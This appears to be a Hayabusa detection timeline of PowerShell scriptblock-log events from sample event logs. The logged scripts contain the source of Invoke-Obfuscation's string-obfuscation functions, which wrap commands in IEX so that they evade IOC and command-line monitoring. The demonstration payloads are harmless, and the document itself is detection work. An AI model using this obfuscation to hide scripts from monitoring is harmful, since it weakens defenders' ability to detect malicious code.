.PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.249 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.249 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 